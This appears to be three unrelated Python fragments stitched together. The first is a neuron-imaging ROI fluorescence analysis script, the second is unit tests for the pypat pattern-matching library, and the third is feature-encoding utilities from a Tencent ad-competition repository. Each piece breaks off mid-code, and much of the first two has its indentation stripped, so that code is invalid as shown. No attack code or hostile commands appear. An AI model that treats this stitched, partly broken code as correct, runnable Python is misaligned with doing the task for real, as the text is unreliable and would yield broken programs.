# use an automatic segmentation algorithm if possible with a DIC image ?
neurons_png = f'{input_data_folder}/{experiment}/neurons.png'
if os.path.exists(neurons_png):
print('neurons file for delimiting ROI exists')
image = cv2.imread(f'{input_data_folder}/{experiment}/neurons.png',
cv2.IMREAD_GRAYSCALE)
# from scipy.ndimage import convolve
# image_downsampled = convolve(image,
# np.array([[0.25,0.25],[0.25,0.25]]))[:image.shape[0]:2,:image.shape[1]:2]
# image = image_downsampled
#####################################################
##### TO CHANGE IN UPDATED PIPELINE VERSION #########
# else:
# print('no neuron image file')
# pass
# # print('''need user input for ROI file path: it needs to be an image
# from the image folder where you can see the neurons''')
# user_input = [None]
# global user_input_ok
# user_input_ok = False
# thread = Thread(target=input_path, daemon=False)
# thread.start()
# time.sleep(15)
# if user_input_ok:
# thread.join()
# print(user_input)
# else:
# thread._stop()
# if ROI_path.endswith('.txt'):
# with open(ROI_path, "rb") as file:
# rois = pickle.load(file)
# elif ROI_path.endswith('.png'):
# image = cv2.imread(ROI_path, cv2.IMREAD_GRAYSCALE)
# cv2.imwrite(f'{input_data_folder}/{experiment}/neurons.png', image)
# if image.size == 0:
# print('error with neuron image, cannot define ROIs')
# else:
# image = cv2.resize(image, (w,h))
######################################################################
# Show the image
fig = plt.figure()
plt.imshow(image, interpolation='none', cmap='gray')
plt.title("Click on the button to add a new ROI")
# Draw multiple ROI
multiroi_named = MultiRoi(roi_names=['Background', 'ROI 1', 'ROI 2', 'ROI 3', 'ROI 4', 'ROI 5',
'ROI 6', 'ROI 7', 'ROI 8', 'ROI 9', 'ROI 10', 'ROI 11',
'ROI 12', 'ROI 13', 'ROI 14', 'ROI 15', 'ROI 16', 'ROI 17'])
# Draw all ROIs
plt.imshow(image, interpolation='none', cmap='gray')
rois = []
for name, roi in multiroi_named.rois.items():
roi.display_roi()
# roi.display_mean(image)
mask = roi.get_mask(image)
rois.append([name, mask])
plt.legend()
plt.savefig(f'{path_output}/rois.png')
plt.close()
## writing rois to disk
with open(roi_file_path, "wb") as file:
pickle.dump(rois, file)
rois_signal = []
## not the most optimized, would be better to log every roi in each image than load every image multiple times
for roi in rois:
tmp_time_serie_roi = []
for image in tqdm(images):
img = cv2.imread(f'{path_input_images}/{image}',cv2.IMREAD_GRAYSCALE)
mask = roi[1]
#####################################################
##### TO CHANGE IN UPDATED PIPELINE VERSION #########
# roi_average = np.mean(img[mask.T])
roi_average = np.mean(img[mask])
###################################################################
tmp_time_serie_roi.append(roi_average)
rois_signal.append(tmp_time_serie_roi)
print ('generating data plots')
### TIMING DATA ###
json_timings_file = f'{input_data_folder}/{experiment}/{experiment}_timings.json'
json_info_file = f'{input_data_folder}/{experiment}/{experiment}_info.json'
if timing:
timings_dlp_on, \
timings_dlp_off, \
timings_camera_images, \
timings_laser_on, \
timings_laser_off, \
timings_camera_images_bis = load_timing_data(json_timings_file)
# timings perf_counter equivalent to unix timestamp
# timings_camera_images_bis.append(660)
# TODO: handle multiple dlp on/off within each experiment
if len(timings_dlp_on)>1:
print('more than 1 timing from DLP ON')
timings_dlp_on = [timings_dlp_on[0]]
## for diagnostic plot for the times of the camera dcam api metadata
# plt.plot(np.array(timings_camera_images), range(0,len(timings_camera_images)))
## use the timings metadata of the dcap api ## for now broken, replaced with manual incrementation
#timings_camera_images_new = timings_camera_images[time_init : time_end] ## back to this when solved problem of metadata from the dcam api
timings_camera_images_new = []
timings_camera_images_new.append(timings_camera_images[0])
for nb_of_times in range(1,len(timings_camera_images)):
fps = read_fps(json_info_file) ## to get for each expe
timings_camera_images_new.append(timings_camera_images[0] + (1/fps * nb_of_times))
## diagnostic
# plt.plot(np.array(timings_camera_images_new), range(0,len(timings_camera_images_new)))
timings_camera_images = timings_camera_images_new
print(f'number of camera images: {len(timings_camera_images)}')
print(f'number of points in the each roi signal: {len(rois_signal[0])}')
assert len(images) == len(timings_camera_images), 'not the same number of images and images timing metadata' ## will not work when working on subset of the data
## to put both dlp, laser and camera timings in the same format
## putting dlp and laser time refs back into camera ref
#timings_camera_images = [timings_camera_images[i]*10**9 for i in range(len(timings_camera_images))] ##for dcam api meta
_timings_dlp_on = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_dlp_on[0] - timings_camera_images_bis[1])/1000
_timings_dlp_off = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_dlp_off[0] - timings_camera_images_bis[1])/1000
##########################################################################
#################### TO UPDATE #################### ####################
_timings_laser_on = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_laser_on[0] - timings_camera_images_bis[1])/1000
# _timings_laser_on = 0
_timings_laser_off = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_laser_off[0] - timings_camera_images_bis[1])/1000
# _timings_laser_off = 0
################################################################################
################################################################################
timings_dlp_on = []
timings_dlp_off = []
timings_laser_on = []
timings_laser_off = []
timings_dlp_on.append(_timings_dlp_on)
timings_dlp_off.append(_timings_dlp_off)
timings_laser_on.append(_timings_laser_on)
timings_laser_off.append(_timings_laser_off)
### if different length between timings and images
# cropped_rois_signal = []
# for roi_signal in rois_signal:
# cropped_rois_signal.append(roi_signal[0:len(timings_camera_images)])
# len(cropped_rois_signal[0])
# rois_signal = cropped_rois_signal
time_sorted_rois_signal = []
x_axis_sorted_values = []
for i in range(len(rois_signal)):
data = np.vstack((timings_camera_images, rois_signal[i]))
data.shape
time_sorted_rois_signal.append(data[1][data[0,:].argsort()])
x_axis_sorted_values = np.array(data[0][data[0,:].argsort()])
x_axis = np.array([(x_axis_sorted_values[frame] - x_axis_sorted_values[0]) for frame in range(len(x_axis_sorted_values))])
## diagnostic plot: time between 2 images
times_between_two_images = []
for frame in range(len(x_axis)-1):
times_between_two_images.append((x_axis[frame+1] - x_axis[frame]))
times_between_two_images.append(times_between_two_images[-1])
nb_images = np.arange(0,len(data[1]), 1)
#plt.plot(nb_images, np.array(times_between_two_images))
rois_signal = time_sorted_rois_signal
## for baseline calculation:
if timing:
# find laser_on index on x_axis
takeClosest = lambda num,collection:min(collection,key=lambda x:abs(x-num))
closest_index_laser_on_on_x = takeClosest(timings_laser_on[0]/10**9, x_axis)
index_laser_on_for_baseline_calc = np.where(x_axis == closest_index_laser_on_on_x)
# find dlp_on index on x_axis
closest_index_dlp_on_on_x = takeClosest(timings_dlp_on[0]/10**9, x_axis)
index_dlp_on_for_baseline_calc = np.where(x_axis == closest_index_dlp_on_on_x)
## baseline starting and ending
## need to be timed on the frames after laser activation I think
baseline_starting_frame = index_laser_on_for_baseline_calc[0][0] + 2
#TODO: need to be adjusted to be up to the frame-1 of dlp activation ?
baseline_frame_number = 10
else :
baseline_starting_frame = 1000
baseline_frame_number = 10
### GRAPHS ###
# calculation of F(t)
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w']
# if timings is False no x_axis has been defined
if timing == False:
x_axis = np.arange(0,len(images), 1)
for i in range(len(rois_signal)):
plt.plot(x_axis, np.array(rois_signal[i]),
color = colors[i], label = rois[i][0], alpha=0.7)
if timing:
for i in range(len(timings_dlp_on)):
if draw_dlp_timings:
plt.axvspan(timings_dlp_on[i] - x_axis_sorted_values[0],
timings_dlp_off[i] - x_axis_sorted_values[0],
color='blue', alpha=0.05)
if draw_laser_timings:
plt.axvspan(timings_laser_on[i] - x_axis_sorted_values[0],
timings_laser_off[i] - x_axis_sorted_values[0],
color='red', alpha=0.05)
plt.legend()
plt.title('Pixel value evolution with frames')
plt.ylabel('Value')
if timing == False:
plt.savefig(f'{path_output}pixel_time_serie_whole_data.svg')
#plt.savefig(path_output+'pixel_time_serie_whole_data.png')
elif timing == True:
plt.savefig(f'{path_output}pixel_time_serie_whole_data_{time_start}_{time_stop}.svg')
#plt.savefig(f'{path_output}pixel_time_serie_whole_data_{args.time[0]}_{args.time[1]}.png')
plt.close()
## calculation of F(t) - background(t)
for i in np.arange(1, len(rois_signal), 1):
plt.plot(x_axis, np.array(rois_signal[0])-np.array(rois_signal[i]), color = colors[i], label = rois[i][0], alpha=0.7)
if timing:
for i in range(len(timings_dlp_on)):
if draw_dlp_timings:
plt.axvspan(timings_dlp_on[i] - x_axis_sorted_values[0],timings_dlp_off[i] - x_axis_sorted_values[0], color='blue', alpha=0.05)
if draw_laser_timings:
plt.axvspan(timings_laser_on[i] - x_axis_sorted_values[0],timings_laser_off[i] - x_axis_sorted_values[0], color='red', alpha=0.05)
plt.title('Fluorescence with substracted backg fluorescence (per frame)')
plt.ylabel('Value')
plt.legend()
if timing == False:
plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_whole_data.svg')
#plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_whole_data.png')
elif timing == True:
plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_{time_start}_{time_stop}.svg')
#plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_{args.time[0]}_{args.time[1]}.png')
plt.close()
## calculation of percent delta F/F0
times = []
baseline_background = np.mean(np.array(rois_signal[0][baseline_starting_frame:baseline_starting_frame+baseline_frame_number])) ## temporal average
if baseline_background == 0.0:
baseline_background = 1.0
dF_over_F0_background = ((np.array(rois_signal[0]) - baseline_background) / baseline_background)
percent_dF_over_F0_background = dF_over_F0_background*100
# plt.plot(x_axis, percent_dF_over_F0_background, color= 'b', label = rois[0][0], alpha=0.7)
if timing:
for i in range(len(timings_dlp_on)):
if draw_dlp_timings:
plt.axvspan(timings_dlp_on[i] - x_axis_sorted_values[0],timings_dlp_off[i] - x_axis_sorted_values[0], color='blue', alpha=0.05)
if draw_laser_timings:
plt.axvspan(timings_laser_on[i] - x_axis_sorted_values[0],timings_laser_off[i] - x_axis_sorted_values[0], color='red', alpha=0.05)
for i in np.arange(1, len(rois_signal), 1):
_times = []
baseline_soma = np.mean(np.array(rois_signal[i][baseline_starting_frame:baseline_starting_frame + baseline_frame_number]))
if baseline_soma == 0.0:
baseline_soma = 1.0
dF_over_F0_soma = ((np.array(rois_signal[i]) - baseline_soma) / baseline_soma) - dF_over_F0_background
percent_dF_over_F0_soma = dF_over_F0_soma * 100
# plt.ylim([-5,35])
plt.plot(x_axis, percent_dF_over_F0_soma, color = colors[i], label = rois[i][0], alpha=0.7)
data_export.append(percent_dF_over_F0_soma.tolist())
if timing:
dlp_on_value_on_x = 0
dlp_off_value_on_x = 0
laser_off_value_on_x = 0
laser_on_value_on_x = 0
for i in range(len(timings_dlp_on)):
if draw_dlp_timings:
dlp_on_value_on_x = timings_dlp_on[i] - x_axis_sorted_values[0]
dlp_off_value_on_x = timings_dlp_off[i] - x_axis_sorted_values[0]
plt.axvspan(dlp_on_value_on_x, dlp_off_value_on_x, color='blue', alpha=0.05)
if draw_laser_timings:
laser_on_value_on_x = timings_laser_on[i] - x_axis_sorted_values[0]
laser_off_value_on_x = timings_laser_off[i] - x_axis_sorted_values[0]
plt.axvspan(laser_on_value_on_x, laser_off_value_on_x, color='red', alpha=0.05)
_times = dlp_on_value_on_x, dlp_off_value_on_x , laser_on_value_on_x, laser_off_value_on_x
times.append(_times)
plt.ylabel(r'$\%$ | |
# Repo: mvitousek/pypat
import unittest
from pypat import *
class TestExamples(unittest.TestCase):
# Matching against literal values
def test_literal(self):
    """A target matches the first case whose literal value equals it."""
    self.assertTrue(match(42,
                          (234, lambda: False),
                          (True, lambda: False),
                          (42, lambda: True)))
# If no case matches, a PatternException is thrown
def test_fail(self):
    """match() raises PatternException when no case matches."""
    def attempt():
        return match(999,
                     (234, lambda: False),
                     (True, lambda: False),
                     (42, lambda: True))
    self.assertRaises(PatternException, attempt)
# Special case: if you want to match against string literals in
# patterns, you must wrap it in a Literal object (to disambiguate
# from variable bindings, as shown later)
def test_explicitliteral1(self):
    """Literal('...') matches an equal string target."""
    outcome = match('hello world',
                    (Literal('hello world'), lambda: True),
                    (42, lambda: False))
    self.assertTrue(outcome)
def test_explicitliteral2(self):
    """A Literal string pattern does not match a non-string target."""
    outcome = match(42,
                    (Literal('hello world'), lambda: True),
                    (42, lambda: False))
    self.assertFalse(outcome)
# Strings that are not wrapped in Literal are variables. The
# pattern's action function expects parameters with the same names
# as the variables in the pattern. Variables match anything.
def test_variables(self):
    """Bare-string variable patterns match anything and bind the value."""
    class Arbitrary(object):
        def __eq__(self, other):
            return self.__class__ == other.__class__
    bound = match(Arbitrary(),
                  (42, lambda: False),
                  ('x', lambda x: x))
    self.assertEqual(bound, Arbitrary())
# If you want to match against any value without binding it to a
# variable, use the '_' symbol (in a string).
def test_any(self):
    """The '_' wildcard matches any value without binding it."""
    self.assertTrue(match(4545,
                          (42, lambda: False),
                          (10101, lambda: False),
                          ('_', lambda: True)))
# You can also add guards to cases. The guard is an instance of
# type Guard, which takes a function, which itself takes variables
# introduced in its pattern. The guard can go in between the
# pattern and the action function of the case.
def test_guards(self):
    """A Guard between pattern and action filters candidate matches."""
    outcome = match('hello world',
                    ('x', Guard(lambda x: isinstance(x, int)), lambda x: x * x),
                    ('x', Guard(lambda x: isinstance(x, str)), lambda x: x))
    self.assertEqual(outcome, 'hello world')
# You can match against tuples by putting tuples in your
# patterns. Tuples can contain any pattern, and variables will be
# bound appropriately.
def test_tuple(self):
    """Tuple patterns destructure tuples and bind nested variables."""
    def arith(*op):
        return match(op,
                     ((Literal('+'), 'x', 'y'), lambda x, y: x + y),
                     ((Literal('*'), 'x', 'y'), lambda x, y: x * y),
                     ((Literal('pred'), 'x'), lambda x: x - 1))
    self.assertEqual(arith('pred', 4), 3)
    self.assertEqual(arith('+', 39, 3), 42)
    self.assertEqual(arith('*', 4, 5), 20)
# If the same variable appears more than once in a pattern, it has
# to be bound to the same value each time for the pattern to match
def test_multi(self):
    """A variable repeated in one pattern must bind the same value twice."""
    def same(left, right):
        return match((left, right),
                     (('x', 'x'), lambda x: True),
                     (('x', 'y'), lambda x, y: False))
    self.assertTrue(same(3, 3))
    self.assertFalse(same(2, 5))
# If the same action (and variable bindings) will be used for
# multiple cases, you can add additional patterns to a case with
# the Or class, which takes a pattern.
def test_ors(self):
    """Or(...) attaches an alternative pattern to the same action."""
    def times_will_eq_zero(n1, n2):
        return match((n1, n2),
                     ((0, 'x'), Or(('x', 0)), lambda x: True),
                     ('_', lambda: False))
    self.assertTrue(times_will_eq_zero(0, 43))
    self.assertTrue(times_will_eq_zero(42, 0))
    self.assertFalse(times_will_eq_zero(42, 2))
# Lists can be matched against using the PairList and EmptyList
# classes. PairLists are nonempty lists that have a head and a
# tail, and EmptyLists are empty lists.
def test_list(self):
    """PairList/EmptyList decompose lists into head/tail or empty."""
    def apply_all(fn, seq):
        return match(seq,
                     (PairList('x', 'xs'), lambda x, xs: [fn(x)] + apply_all(fn, xs)),
                     (EmptyList(), lambda: []))
    self.assertEqual(apply_all((lambda x: x * x), [1, 2, 3, 4]), [1, 4, 9, 16])
# You can match based on the runtime type of a matched value by
# putting types in the patterns.
def test_types(self):
    """A type in a pattern matches targets of that runtime type."""
    self.assertTrue(match('hello world',
                          (int, lambda: False),
                          (str, lambda: True)))
# If you want to bind the target (or a portion of it) to a
# variable, but you also want to pattern match on something deeper
# in the target, you can use the As class to do both:
def test_as(self):
    """As(name, pattern) binds a value while also matching its structure."""
    def expr(*op):
        return match(op,
                     ((Literal('+'), As('x', int), As('y', int)), lambda x, y: x + y),
                     ((Literal('or'), As('x', bool), As('y', bool)), lambda x, y: x or y))
    self.assertEqual(expr('+', 39, 3), 42)
    self.assertEqual(expr('or', True, False), True)
    self.assertRaises(PatternException, lambda: expr('or', 1, 2))
def test_deepas(self):
    """As patterns may be nested arbitrarily deep inside list patterns."""
    described = match([1, 2, 3],
                      (PairList('_', As('r', PairList(As('x', int), '_'))),
                       lambda x, r: '%s is in %s' % (x, r)))
    self.assertEqual(described, '2 is in [2, 3]')
# Objects that do not perform any kind of input checking can be
# subclassed from PureMatchable and then used as patterns.
def test_purematch1(self):
    """PureMatchable subclasses can be used directly as patterns."""
    class C(PureMatchable):
        def __init__(self, a, b, c):
            pass
    outcome = match(C(1, 2, '3'),
                    (C(3, 'b', 'c'), lambda b, c: b),
                    (C('a', 'b', Literal('3')), lambda a, b: a),
                    (C('a', 'b', 'c'), lambda a, b, c: c),
                    ('_', lambda: None))
    self.assertEqual(outcome, 1)
def test_purematch2(self):
    """Small-step arithmetic interpreter built from PureMatchable patterns."""
    class Expr(PureMatchable):
        pass
    class Add(Expr):
        def __init__(self, rand1, rand2):
            pass
    class Mult(Expr):
        def __init__(self, rand1, rand2):
            pass
    class Num(Expr):
        def __init__(self, n):
            pass
    def step(expr):
        # One reduction step; cases are ordered so fully-numeric operands
        # reduce first, then the right operand, then the left.
        return match(expr,
            (Add(Num('n1'), Num('n2')),
             lambda n1, n2: Num(n1 + n2)),
            (Add(Num('n1'), 'n2'),
             lambda n1, n2: Add(Num(n1), step(n2))),
            (Add('n1', 'n2'),
             lambda n1, n2: Add(step(n1), n2)),
            (Mult(Num('n1'), Num('n2')),
             lambda n1, n2: Num(n1 * n2)),
            (Mult(Num('n1'), 'n2'),
             lambda n1, n2: Mult(Num(n1), step(n2))),
            (Mult('n1', 'n2'),
             lambda n1, n2: Mult(step(n1), n2)))
    def eval(expr):
        # Step until the expression is a bare Num.
        return match(expr,
            (Num('n'), lambda n: n),
            ('e', lambda e: eval(step(e))))
    # (4*2) + (1 + (0 + 1)) == 10
    self.assertEqual(eval(Add(Mult(Num(4), Num(2)), Add(Num(1), Add(Num(0), Num(1))))),
                     10)
# Objects that can't be PureMatchable (because, for example, they
# sanitize inputs, or it makes sense to decompose them into
# something other than their constructor's arguments) can subclass
# from Matchable, and implement pattern() (which is a class
# method) and decompose(). decompose() returns the decomposition
# of the object, which can be anything the user desires as long as
# it is a valid match target. pattern() should take patterns and
# return them in such a way that they can match decompose()
# (including caveats like strings needing to be in
# Literal). [CLASS].pattern() should then be used in lieu of the
# classname alone.
def test_matchable(self):
    """Matchable classes supply decompose() and pattern() for matching."""
    class Summer(Matchable):
        def __init__(self, *nums):
            self.sum = sum(nums)
        def decompose(self):
            # Anything match() can target is a valid decomposition.
            return ('SUM', self.sum)
        @classmethod
        def pattern(cls, pat):
            return (Literal('SUM'), pat)
    outcome = match(Summer(1, 2, 3, 4, 5),
                    (Summer.pattern(54), lambda: False),
                    (Summer.pattern(As('x', int)), lambda x: x))
    self.assertEqual(outcome, 15)
# Functions can be defined as part of a match pattern with the
# @matchable decorator, and the @[FUN].case decorator (where fun
# is the name of the actual partially specified function)
def test_sepdef1(self):
    """Define a function case-by-case with @matchable and @fun.case."""
    # Base definition matches the literal 1.
    @matchable(1)
    def factorial():
        return 1
    @factorial.case(0)
    def factorial():
        return 0
    # Guard restricts this case to n > 1, so other inputs (e.g. negatives)
    # fall through and raise PatternException.
    @factorial.case(As('n',int), Guard(lambda n: n > 1))
    def factorial(n):
        return factorial(n-1) * n
    self.assertEqual(factorial(5), 120)
    self.assertRaises(PatternException, lambda: factorial(-5))
def test_sepdef2(self):
    """Case-by-case definitions with differing arities and Or patterns."""
    # Base case: a single argument equal to the string 'Dog.', bound to x.
    @matchable(As('x',Literal('Dog.')))
    def foo(x):
        return x
    # 42 or -42 (the Or alternative is a one-element tuple pattern).
    @foo.case(42, Or((-42,)))
    def foo():
        return 'it\'s 42!!'
    # Two arguments: anything followed by an int.
    @foo.case('a', int)
    def foo(a):
        return 'cdrnum'
    # Zero arguments.
    @foo.case()
    def foo():
        return 'EMPTY'
    self.assertEqual(foo(42), 'it\'s 42!!')
    self.assertEqual(foo(3,2), 'cdrnum')
    self.assertEqual(foo('Dog.'), 'Dog.')
    self.assertEqual(foo(), 'EMPTY')
    self.assertRaises(PatternException, lambda: foo(3,'a'))
    self.assertRaises(PatternException, lambda: foo(22))
# Match object can be built and cases added to them.
def test_matchobj(self):
    """Match objects are callable matchers that accept new cases later."""
    dispatch = Match([(42, lambda: 'yes')])
    dispatch.add('x', Guard(lambda x: isinstance(x, int)), lambda x: x)
    dispatch.add(('x', 'y'), lambda x, y: x + y)
    self.assertEqual(dispatch(42), 'yes')
    self.assertEqual(dispatch(120), 120)
    self.assertEqual(dispatch((1, 2)), 3)
    self.assertRaises(PatternException, lambda: dispatch('bluh'))
    # A late wildcard case turns former misses into hits.
    dispatch.add('_', lambda: 'miss')
    self.assertEqual(dispatch('bluh'), 'miss')
def test_lambda(self):
class LC(PureMatchable):
pass
class Abs(LC):
def __init__(self, x, e): pass
class App(LC):
def __init__(self, e1, e2): pass
class Var(LC):
def __init__(self, x): pass
# Lambda calculus
def pp(e):
return match(e,
(Var('x'), lambda x: x),
(Abs('x', 'e'),
lambda x,e: '(lambda %s: %s)' % (x, pp(e))),
(App('e1', 'e2'),
lambda e1,e2: '%s(%s)' % (pp(e1), pp(e2))))
def is_val(e):
return match(e,
(Abs, lambda: True),
('_', lambda: False))
def step(e):
return match(e,
(App(Abs('x', 'e1'), 'e2'),
Guard(lambda x,e1,e2: is_val(e2)),
lambda x,e1,e2: subst(e1, x, e2)),
(App(As('e1', Abs), 'e2'),
lambda e1,e2: App(e1, step(e2))),
(App('e1', 'e2'),
lambda e1,e2: App(step(e1), e2)),
name='step')
def subst(e, x, v):
return match((e, x),
((App('e1', 'e2'), '_'),
lambda e1,e2: App(subst(e1,x,v), subst(e2,x,v))),
((As('e1',Abs('x', 'eb')), 'x'),
lambda e1,x,eb: e1),
((Abs('y','e'), '_'),
lambda y,e: Abs(y,subst(e,x,v))),
((Var('x'), 'x'),
lambda x: v),
((Var('y'), '_'),
lambda y: Var(y)))
def leval(e):
return match(e,
('_', Guard(lambda: is_val(e)), lambda: e),
('_', lambda: leval(step(e))))
plus = Abs('m', Abs('n', Abs('f', Abs('x',
App(
App(Var('m'), Var('f')),
App(
App(Var('n'), Var('f')),
Var('x')))))))
zero = Abs('f', Abs('x', Var('x')))
one = Abs('f', Abs('x', App(Var('f'), Var('x'))))
two = Abs('f', Abs('x', App(Var('f'),
App(Var('f'),
Var('x')))))
three = Abs('f', Abs('x', App(Var('f'),
App(Var('f'),
App(Var('f'),
Var('x'))))))
threeq = leval(App(App(plus, one), two))
psucc | |
# Repo: tangaqi/tencent2019-rank88 — file: tencent-chusai/src/utils.py
import os
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.metrics import roc_auc_score
from time import time
import random
import pandas as pd
def frame_to_dict(train):
    """Convert a DataFrame into a {column name: column values} mapping.

    Args:
        train (pd.DataFrame): frame to convert.

    Returns:
        dict: each column name mapped to its values as a numpy array.
    """
    train_dict = {}
    for col in train.columns:
        # Fixed: the original stored `train[col].columns` (a Series has no
        # .columns attribute) and returned the misspelled name `trian_dict`
        # (a NameError at runtime).
        train_dict[col] = train[col].values
    return train_dict
def write_data_into_parts(data, root_path, nums = 5100000):
    """Split `data` into chunks of at most `nums` rows and dump each chunk
    as raw binary.

    Args:
        data (np.ndarray): array to split along its first axis.
        root_path (str): path prefix; part i goes to "{root_path}_{i}.bin".
        nums (int): maximum number of rows per part.
    """
    l = data.shape[0] // nums
    for i in range(l + 1):
        begin = i * nums
        end = min(nums * (i + 1), data.shape[0])
        t_data = data[begin:end]
        # Fixed: the original wrote every chunk to the same
        # f"{root_path}.bin", so each part silently overwrote the previous
        # one; the part index is now part of the filename.
        t_data.tofile(f'{root_path}_{i}.bin')
def write_dict(path, data):
    """Persist `data` as one "key,value" line per mapping entry."""
    sink = open(path, 'w')
    for key in data:
        sink.write('%s,%s\n' % (key, data[key]))
    sink.close()
def read_allfea(path):
    """Read the feature-vocabulary file and build a value -> index mapping.

    The file's LAST line is taken as the comma-separated vocabulary.
    Indices are 1-based; a '-1' fallback entry is added for unseen values.

    Args:
        path (str): vocabulary file path.

    Returns:
        tuple: (raw last line, {feature value: 1-based index}).
    """
    # Fixed: the original never closed the file handle; `with` guarantees it.
    with open(path, 'r') as f:
        fea = '0'
        for line in f:
            fea = line
    fea_val = fea.split(',')
    index_dict = {}
    for i, value in enumerate(fea_val):
        index_dict[value] = i + 1
    # NOTE(review): when '-1' is absent it is mapped to len(fea_val), which
    # collides with the last real feature's index — preserved as-is.
    if '-1' not in index_dict:
        index_dict['-1'] = len(fea_val)
    return fea, index_dict
def one_hot_feature_process(train_data, val_data, test2_data, begin_num, filter_num = 0):
    """Label-encode a categorical feature across the three data splits.

    Values first seen in train/val receive fresh indices starting at
    `begin_num`; values unseen at test time fall back to the reserved
    '-1' index. `filter_num` is unused and kept for compatibility.
    """
    index_dict = {}
    next_index = begin_num
    train_res = []
    for value in train_data:
        if value not in index_dict:
            index_dict[value] = next_index
            next_index += 1
        train_res.append(index_dict[value])
    # Reserve a fallback slot for unseen values. The counter is NOT
    # advanced here, mirroring the original implementation (a later new
    # value shares this index).
    if '-1' not in index_dict:
        index_dict['-1'] = next_index
    val_res = []
    for value in val_data:
        if value not in index_dict:
            index_dict[value] = next_index
            next_index += 1
        val_res.append(index_dict[value])
    test2_res = []
    for value in test2_data:
        key = value if value in index_dict else '-1'
        test2_res.append(index_dict[key])
    return np.array(train_res), np.array(val_res), np.array(test2_res), index_dict
def vector_feature_process(train_data, val_data, test2_data, begin_num, max_len, index_dict):
    """Encode a comma-separated multi-value feature for the three splits.

    Each sample becomes:
      * an index row of length `max_len` (zero padded),
      * a multi-hot row of length `max_len`,
      * a fill rate len(values)/max_len.
    Samples longer than `max_len` (or equal to the sentinel 'all') are
    filled with the first `max_len` vocabulary indices and rate 1.

    Args:
        train_data, val_data, test2_data: iterables of comma-joined strings.
        begin_num: unused; kept for interface compatibility.
        max_len (int): fixed output row length.
        index_dict (dict): value -> index vocabulary ('-1' is the fallback).

    Returns:
        tuple of 10 items: (train_idx, val_idx, test_idx, index_dict,
        train_hot, val_hot, test_hot, train_rate, val_rate, test_rate).
    """
    def _encode(split):
        # One pass over a split (the original repeated this loop three
        # times verbatim); returns (index rows, multi-hot rows, rates).
        res, hot, rate = [], [], []
        for d in split:
            lx = d.split(',')
            row = [0] * max_len
            row2 = [0] * max_len
            if len(lx) > max_len or d == 'all':
                # Overlong / 'all' samples: take the first max_len vocab
                # indices (dict insertion order) and mark every slot set.
                j = 0
                for key in index_dict:
                    if j >= max_len:
                        break
                    row[j] = index_dict[key]
                    j += 1
                res.append(row)
                hot.append([1] * max_len)
                rate.append(1)
                continue
            for i, x in enumerate(lx):
                if x not in index_dict:
                    x = '-1'
                row[i] = index_dict[x]
                # NOTE(review): the hot row is indexed by the vocabulary
                # index itself, so this assumes all indices < max_len —
                # preserved exactly from the original.
                row2[row[i]] = 1
            res.append(row)
            hot.append(row2)
            rate.append(len(lx) / max_len)
        return res, hot, rate

    train_res, train_res2, train_rate = _encode(train_data)
    val_res, val_res2, val_rate = _encode(val_data)
    test2_res, test2_res2, test2_rate = _encode(test2_data)
    return (np.array(train_res), np.array(val_res), np.array(test2_res),
            index_dict,
            np.array(train_res2), np.array(val_res2), np.array(test2_res2),
            np.array(train_rate), np.array(val_rate), np.array(test2_rate))
def count_one_feature_times(train, val, test, fea, date):
    """Rolling two-day frequency counts for a single-valued feature.

    For each day in `date`, counts occurrences of each `fea` value over the
    two preceding days and assigns that (halved) count to the current day's
    rows. Day labels '2_16', '2_17', '3_18', '3_19' are hard-coded window
    boundaries; the test split is scored against '3_18' + '3_19'.
    Returns (train counts, val counts, test counts) as numpy arrays.
    """
    count_dict = {}
    val_res = []
    test_res = []
    # val is the last day; merge it so window slicing sees all days.
    train = pd.concat([train, val])
    num1 = train[train['Reqday'] == '2_16'].shape[0]
    num2 = train[train['Reqday'] == '3_19'].shape[0]
    num3 = train.shape[0]
    # Placeholder value for rows with no preceding window.
    train_res = [-1] * num1
    # (translated) count over the 2-17 data, assign to the 2-16 data
    train1 = train[train['Reqday'] == '2_17'][fea].values
    for i,values in enumerate(train1):
        if values not in count_dict:
            count_dict[values] = 0
        count_dict[values] += 1
    # '-1' is the fallback bucket for values unseen in the window.
    if '-1' not in count_dict:
        count_dict['-1'] = 1
    train1 = train[train['Reqday'] == '2_16'][fea].values
    for i, values in enumerate(train1):
        if values not in count_dict:
            values = '-1'
        train_res.append(count_dict[values])
    # Rolling window: count days (date[i], date[i+1]), score day date[i+2].
    for i in range(len(date)-2):
        count_dict = {}
        day1 = date[i+2]
        day2 = date[i+1]
        day3 = date[i]
        train_compute = train[train['Reqday'] == day1][fea].values
        train1 = train[train['Reqday'] == day2]
        train2 = train[train['Reqday'] == day3]
        count_train = pd.concat([train1, train2])
        count_train_data = count_train[fea].values
        for values in count_train_data:
            if values not in count_dict:
                count_dict[values] = 0
            count_dict[values] += 1
        if '-1' not in count_dict:
            count_dict['-1'] = 1
        for values in train_compute:
            if values not in count_dict:
                values = '-1'
            # Halved: the count covers a two-day window.
            train_res.append(count_dict[values]/2)
    # Split back: the last num2 entries belong to the val day ('3_19').
    train_res1 = train_res[:num3-num2]
    val_res = train_res[-num2:]
    count_dict = {}
    # Test rows are scored against the fixed '3_18' + '3_19' window.
    train1 = train[train['Reqday'] == '3_18']
    train2 = train[train['Reqday'] == '3_19']
    count_train = pd.concat([train1, train2])
    count_train_data = count_train[fea].values
    for values in count_train_data:
        if values not in count_dict:
            count_dict[values] = 0
        count_dict[values] += 1
    if '-1' not in count_dict:
        count_dict['-1'] = 1
    for values in test:
        if values not in count_dict:
            values = '-1'
        test_res.append(count_dict[values]/2)
    # print(train_res1)
    return np.array(train_res1), np.array(val_res), np.array(test_res)
def count_vector_feature_times(train, val, test, fea, date, flag):
    """Rolling two-day frequency statistics for a comma-separated feature.

    For each day, counts how often every individual value of `fea` occurred
    over the two preceding days, then records per-sample [max, mean] of
    those counts (halved, as a two-day average) for the current day.
    Day '2_17' is bootstrapped from '2_16' alone (counts not halved), and
    the first day '2_16' is padded with [-1, -1]. The test split is scored
